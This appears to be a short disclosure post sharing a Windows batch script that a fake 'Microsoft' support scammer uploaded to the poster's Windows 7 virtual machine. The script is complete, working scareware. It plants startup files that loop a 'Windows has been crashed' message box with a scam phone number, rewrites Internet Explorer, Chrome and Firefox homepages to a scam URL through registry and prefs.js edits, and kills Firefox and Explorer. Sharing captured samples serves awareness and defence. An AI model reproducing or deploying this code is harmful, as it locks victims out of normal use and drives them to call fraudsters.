Windows batch script uploaded remotely to my Windows 7 virtual machine by fake "Microsoft" support scammer.

antivirus.txt

@echo off 
rem Navigate to startup folder 
cd "%userprofile%\Start Menu\Programs\Startup" 
echo DO >> "startup1.vbs"
echo MSGBOX "WINDOWS HAS BEEN CRASHED, CALL WINDOWS SUPPORT 844-666-0661 FOR HELP  " >> "startup1.vbs"
echo LOOP >> "startup1.vbs"
@echo off 
echo cd "C:\Windows\System32" > "startup1.bat" 
rem Navigate to startup folder 
cd "%userprofile%\Start Menu\Programs\Startup" 
echo @echo off >> "startup1.bat"
echo Go to Begin >> "startup1.bat"
echo @echo off >> "startup1.bat"
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat"
echo @echo off >> "startup1.bat"
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\GOOGLE CHROME\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat"
echo @echo off >> "startup1.bat"
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\MOZILLA FIREFOX\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat"

echo taskkill /im firefox.exe* /f >> "startup1.bat"

echo cd /D "%APPDATA%\Mozilla\Firefox\Profiles" >> "startup1.bat"
echo cd *.default >> "startup1.bat"
echo set ffile=%cd% >> "startup1.bat"
echo echo user_pref("browser.startup.homepage", "http://wetech365.com/popup.jpg");>>"%ffile%\prefs.js" >> "startup1.bat"
echo set ffile= >> "startup1.bat"
echo cd %windir% >> "startup1.bat"

echo javascript:(function(){ window.location.href='http://wetech365.com/popup.jpg';})(); >> "startup1.bat"


echo taskkill /f /IM explorer.exe >> "startup2.bat"